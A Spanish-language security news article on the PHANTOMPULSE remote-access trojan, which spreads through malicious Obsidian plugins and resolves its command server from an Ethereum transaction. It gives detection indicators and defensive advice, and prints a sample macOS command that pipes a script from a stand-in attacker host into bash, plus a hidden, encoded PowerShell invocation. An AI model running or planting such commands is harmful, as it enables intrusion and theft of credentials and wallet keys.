PHANTOMPULSE: RAT en Obsidian resuelve su C2 leyendo Ethereum

Investigadores de seguridad documentaron PHANTOMPULSE, un troyano de acceso remoto (RAT) que abusa la aplicación de notas Obsidian para infectar a profesionales del sector financiero y cripto en Windows y macOS. La cadena de ataque, designada como REF6598, combina ingeniería social sofisticada en LinkedIn y Telegram con un truco técnico relativamente nuevo en el panorama: el PHANTOMPULSE RAT consulta la blockchain de Ethereum para resolver la dirección de su servidor de comando y control.

Lo novedoso no es la entrega — un vault compartido con plugins comunitarios maliciosos — sino el canal de C2: una wallet hardcodeada cuya última transacción contiene la IP del servidor de control. Apagar la infraestructura del atacante requiere algo más que reportar un dominio; implica intervenir en una red descentralizada diseñada precisamente para resistir censura.

TL;DR

• Investigadores identificaron REF6598, una campaña que abusa Obsidian para entregar el RAT PHANTOMPULSE en Windows y macOS.
• Los atacantes se hacen pasar por capitalistas de riesgo en LinkedIn y mueven la conversación a Telegram para ganar confianza.
• El vector es un vault compartido de Obsidian que pide habilitar plugins comunitarios maliciosos: Shell Commands y Hider.
• En Windows ejecuta PowerShell con el loader PHANTOMPULL; en macOS usa AppleScript con el mismo principio.
• PHANTOMPULSE consulta la blockchain de Ethereum para resolver la IP del C2 desde una wallet hardcodeada, resistente a takedowns.
• Capacidades del RAT: keylogging, capturas de pantalla, exfiltración de archivos y ejecución de comandos arbitrarios.
• El objetivo son profesionales de cripto y finanzas: claves de wallets, credenciales de exchanges y estrategias de trading.

Qué pasó: REF6598 y el perfil del objetivo

Un equipo de investigación de amenazas documentó una operación de espionaje dirigido contra un perfil muy específico de víctima: profesionales que trabajan en fondos cripto, mesas de trading, exchanges y firmas de inversión enfocadas en activos digitales. La campaña, rastreada bajo el identificador interno REF6598, no es masiva ni oportunista: los atacantes seleccionan objetivos por su rol y por el acceso que tienen a fondos, claves o información de mercado.

El punto de contacto inicial casi siempre es LinkedIn. El operador se presenta como representante de un fondo de capital de riesgo o como analista interesado en una posible inversión, una práctica común en el ecosistema cripto donde los acercamientos en frío son rutina. Tras un par de mensajes, la conversación se mueve a un grupo privado de Telegram, donde el atacante propone «colaborar» en un documento compartido. Ese documento no llega como PDF ni como Google Doc: es un vault compartido de Obsidian, alojado en un servicio en la nube.

La elección de Obsidian no es casualidad. La aplicación tiene una reputación impecable entre desarrolladores, analistas y trabajadores del conocimiento. Es local-first, los archivos viven en disco como Markdown plano, y el modelo de extensiones se siente cercano al de VS Code. Para alguien acostumbrado a Cursor o Neovim, instalar un plugin en Obsidian se percibe como un acto cotidiano y seguro.

💭 Clave: La superficie de ataque no es Obsidian: es la confianza acumulada del usuario en su propio flujo de trabajo. Cuando el atacante construye contexto durante dos semanas en LinkedIn, abrir un vault compartido se vuelve una acción de bajo escrutinio.

Anatomía del ataque: del primer mensaje al RAT en memoria

La cadena tiene cinco etapas bien diferenciadas. Cada paso individual parece inocuo y reversible; el daño solo emerge cuando se combinan.

• Engagement inicial (T1566.002): mensaje en LinkedIn de una cuenta con foto profesional, título plausible y conexiones aparentemente reales. La cuenta lleva meses activa.
• Pivot a Telegram: «Mejor hablamos por acá, es más rápido». Se crea un grupo con uno o dos cómplices que actúan como analistas o socios.
• Invitación al vault: se comparte un enlace a un vault de Obsidian alojado en la nube. El vault contiene notas legítimas (memos de mercado, modelos de valuación) para reforzar la fachada.
• Habilitación de plugins (T1204.002): al abrir el vault, Obsidian detecta plugins comunitarios y pide permiso explícito. El atacante guía al usuario por chat: «Activá los plugins, son los que uso para mis dashboards».
• Ejecución: los plugins maliciosos — versiones tampered de Shell Commands y Hider — disparan un script al cargarse. En Windows es PowerShell; en macOS, AppleScript.

Cadena completa de REF6598: del contacto en LinkedIn al RAT en memoria.

graph LR
  A["LinkedIn: VC falso"] --> B["Telegram: grupo privado"]
  B --> C["Vault Obsidian compartido"]
  C --> D["Plugin: Shell Commands"]
  D --> E["PowerShell / AppleScript"]
  E --> F["Loader PHANTOMPULL"]
  F --> G["PHANTOMPULSE en memoria"]
  G --> H["Consulta a Ethereum"]
  H --> I["IP del C2"]

El loader, conocido como PHANTOMPULL, no escribe el payload final a disco. Descifra PHANTOMPULSE en memoria y lo inyecta directamente en un proceso vivo (T1055), una técnica diseñada para evadir productos AV que escanean archivos pero no monitorean memoria de procesos legítimos. En Windows, también modifica el registro (T1112) para asegurar persistencia tras un reinicio.

El C2 en Ethereum: por qué este es el detalle importante

Los autores de malware llevan años luchando contra los takedowns. Los servidores de C2 hardcodeados con IP fija sobreviven horas. Los dominios fijos sobreviven días. Los algoritmos de generación de dominios (DGAs) — que producen miles de candidatos por día — fueron el estándar durante una década, pero las firmas de seguridad aprendieron a reversar los algoritmos y pre-bloquear los dominios futuros.

PHANTOMPULSE introduce un patrón distinto. En el binario hay una sola dirección de wallet de Ethereum, hardcodeada. Cuando el malware necesita su C2:

• Consulta un nodo público de Ethereum (Infura, Alchemy, Cloudflare Ethereum Gateway, o un nodo propio) vía HTTPS o WebSocket.
• Pide la última transacción asociada a la wallet hardcodeada.
• Lee el campo data de esa transacción, que contiene la IP cifrada del servidor de C2.
• Establece la conexión y empieza a recibir comandos (T1102.002).

Cuando el operador quiere rotar de servidor, simplemente envía una nueva transacción con la IP actualizada. El costo es de centavos en gas. Y, crítico: no existe una autoridad que pueda «borrar» esa transacción. Cada nodo en la red Ethereum tiene una copia. Bloquear los nodos públicos es viable a nivel corporativo, pero el atacante puede correr su propio nodo y consultarlo desde la red Tor.

⚠️ Ojo: Esto no es un truco hipotético. El uso de Ethereum como capa de resolución de C2 ya se vio en EtherHiding (2023) y en variantes recientes de loaders cripto, pero PHANTOMPULSE lo lleva a un RAT completo dirigido a humanos individuales, no a sitios web comprometidos.

Por qué Obsidian, y por qué estos dos plugins

El modelo de extensiones de Obsidian se parece al de VS Code: hay un marketplace oficial, pero también se pueden cargar plugins desde un directorio local. Cuando un usuario abre un vault que contiene plugins, Obsidian no los activa por defecto: muestra un aviso pidiendo confirmación manual. Ese aviso es la última línea de defensa. La campaña REF6598 está construida específicamente para que el usuario haga clic en «Confiar» después de dos semanas de buildup social.

Los dos plugins abusados son legítimos en su forma original, lo que hace más insidioso el ataque:

• Shell Commands: permite asociar comandos del sistema operativo a acciones dentro de Obsidian. En su forma legítima, lo usa gente que quiere disparar scripts desde notas. En su versión tampered, ejecuta el dropper en el momento que el plugin se carga.
• Hider: oculta elementos visuales de la interfaz. En el ataque sirve para ocultar el comportamiento sospechoso del primer plugin, eliminando notificaciones que delatarían la ejecución.

Un fragmento simplificado del tipo de comando que dispara el ataque luce así en Windows:

powershell -ExecutionPolicy Bypass -WindowStyle Hidden -EncodedCommand 

Y en macOS:

osascript -e 'do shell script "curl -sL https://attacker.example/payload | bash"'

Ningún defensor experimentado se sorprende por estas líneas. Lo notable es que provienen del proceso Obsidian.exe o Obsidian.app, una aplicación que casi nunca debería estar invocando un intérprete de comandos. Esa anomalía es lo que hace al ataque detectable con EDR.

El prompt de confianza de Obsidian: la última línea de defensa del usuario.

Indicadores de compromiso y telemetría útil

Para los equipos de seguridad, el reporte original lista varios indicadores que pueden traducirse en reglas de detección concretas. Resumimos los más útiles:

• Proceso padre anómalo: Obsidian.exe generando hijos como powershell.exe, cmd.exe, wscript.exe u osascript. Cualquier EDR moderno puede crear una regla específica para esta combinación.
• Línea de comando sospechosa: invocaciones de PowerShell con -ExecutionPolicy Bypass, -WindowStyle Hidden o -EncodedCommand desde procesos no estándar.
• Tráfico saliente a nodos Ethereum: conexiones HTTPS a mainnet.infura.io, eth-mainnet.g.alchemy.com, cloudflare-eth.com o nodos similares, originadas desde procesos que no son wallets ni navegadores con dApps.
• Modificaciones en el directorio de plugins: archivos creados o modificados en [Vault]/.obsidian/plugins/ fuera del flujo del marketplace oficial.

Impacto y por qué este patrón va a escalar

Para un profesional cripto comprometido, las consecuencias inmediatas son graves: claves privadas exportadas, semillas de wallets robadas, sesiones de exchanges secuestradas, estrategias propietarias filtradas. Para un fondo, hablamos potencialmente de movimientos no autorizados con costos de seis o siete cifras antes de que alguien detecte la anomalía.

Pero el patrón importa más allá de las víctimas directas. La combinación de tres elementos — ingeniería social paciente, abuso de aplicaciones legítimas con modelo de plugins, y C2 en blockchain — define un molde que otros operadores van a replicar. No es exagerado esperar variantes similares dirigidas a usuarios de Notion (donde hay integraciones que ejecutan código), Raycast, VS Code Extensions, e incluso plugins de IDEs como JetBrains.

💡 Tip: Si tu organización usa Obsidian o herramientas similares para colaboración, considera tratar la habilitación de plugins comunitarios como un evento de cambio de configuración auditable, no como una preferencia personal del usuario.

Qué sigue: defensa práctica

Las recomendaciones útiles van en cuatro frentes, ordenadas por impacto:

• Detección por comportamiento: una regla EDR que alerte cuando Obsidian.exe genera powershell.exe u osascript es trivial de escribir y captura este ataque en flagrante.
• Application allowlisting: en organizaciones reguladas, restringir la instalación de plugins comunitarios mediante políticas de grupo o MDM.
• Bloqueo de nodos públicos de Ethereum en ambientes corporativos donde no hay justificación de negocio para que estaciones de trabajo consulten infura.io o alchemy.com. Esto rompe el lookup del C2 sin afectar a usuarios legítimos.
• Entrenamiento focalizado: el material genérico de phishing no captura este patrón. La capacitación debe incluir ejemplos concretos de pivots desde LinkedIn hacia Telegram, y la solicitud específica de habilitar plugins en aplicaciones de productividad.

Para usuarios individuales — especialmente quienes manejan wallets cripto personales — la recomendación es más simple y radical: nunca habilites plugins comunitarios en un vault que no construiste vos mismo. Si alguien te comparte un vault, tratá el material como datos, copialo a tu propio vault limpio y leelo ahí.

El ángulo LATAM

El ecosistema cripto en español tiene una superficie atractiva para esta campaña. Argentina, México, Colombia, Brasil y Centroamérica concentran un volumen significativo de traders independientes, fondos pequeños y proyectos DeFi. La práctica del cold outreach por LinkedIn está completamente normalizada — hablar con un supuesto inversor de Miami o Singapur es algo cotidiano. Telegram es el canal por defecto para comunidades cripto regionales.

El operador que pivotee REF6598 al mercado hispano tiene incentivos: menos cobertura mediática, menos firmas de EDR desplegadas en empresas pequeñas, y víctimas con custodia self-managed de wallets sin segundo factor robusto. Vale la pena que las comunidades técnicas regionales socialicen este patrón antes de que aparezcan las primeras víctimas locales.

📖 Resumen en Telegram: Ver resumen

Preguntas frecuentes

¿Qué es exactamente PHANTOMPULSE?

Es un troyano de acceso remoto (RAT) multiplataforma, sin documentación previa, descubierto en la campaña REF6598. Tiene capacidades de keylogging, captura de pantalla, exfiltración de archivos y ejecución arbitraria de comandos, y se entrega exclusivamente mediante abuso de plugins comunitarios en Obsidian.

¿Cómo funciona el C2 vía Ethereum?

El malware tiene una wallet hardcodeada. Consulta un nodo público de Ethereum, lee la última transacción asociada a esa wallet y extrae la IP del C2 del campo data de la transacción. El operador rota servidores enviando nuevas transacciones, sin necesidad de mover infraestructura DNS o hosting.

¿Es vulnerable Obsidian por sí solo?

No. No se trata de una vulnerabilidad en el código de Obsidian sino de un abuso del modelo de plugins comunitarios. El usuario tiene que aprobar manualmente la activación de los plugins maliciosos; la sofisticación está en convencerlo de hacerlo mediante ingeniería social.

¿Cómo me protejo si uso Obsidian?

No habilites plugins comunitarios en vaults compartidos por terceros. Tratá cualquier vault recibido como datos pasivos: copiá las notas a tu propio vault con plugins seleccionados por vos. Si trabajás en una organización, pedí que se monitoree con EDR cualquier ejecución de PowerShell o AppleScript originada por Obsidian.

¿Quién está detrás de REF6598?

El reporte no atribuye la campaña a un actor conocido con nombre público. Las tácticas — targeting de cripto, paciencia operativa, uso de blockchain para infraestructura — son consistentes con grupos previamente observados, pero la atribución formal requiere telemetría adicional que no se ha publicado al momento de este artículo.

¿Veremos más malware con C2 en blockchain?

Casi con certeza, sí. La propiedad de resistencia a takedowns sin requerir infraestructura propia es atractiva para cualquier operador. Lo más probable es que en los próximos meses aparezcan más familias usando Ethereum, Bitcoin OP_RETURN, o cadenas alternativas como Solana para el mismo fin.

Referencias

• CyberNetSec.io — Obsidian Plugin Abused in Social Engineering Campaign to Deliver PHANTOMPULSE RAT — Reporte original con análisis técnico, IOCs y mapeo MITRE ATT&CK.
• Obsidian.md — Sitio oficial de la aplicación de notas; documentación sobre el modelo de plugins comunitarios.
• MITRE ATT&CK T1566.002 — Spearphishing Link, técnica de acceso inicial usada en REF6598.
• MITRE ATT&CK T1102.002 — Bidirectional Communication mediante servicios web, marco para entender el C2 vía Ethereum.
• MITRE ATT&CK T1204.002 — User Execution: Malicious File, la dependencia humana en la cadena de infección.

📱 ¿Te gusta este contenido? Únete a nuestro canal de Telegram @programacion donde publicamos a diario lo más relevante de tecnología, IA y desarrollo. Resúmenes rápidos, contenido fresco todos los días.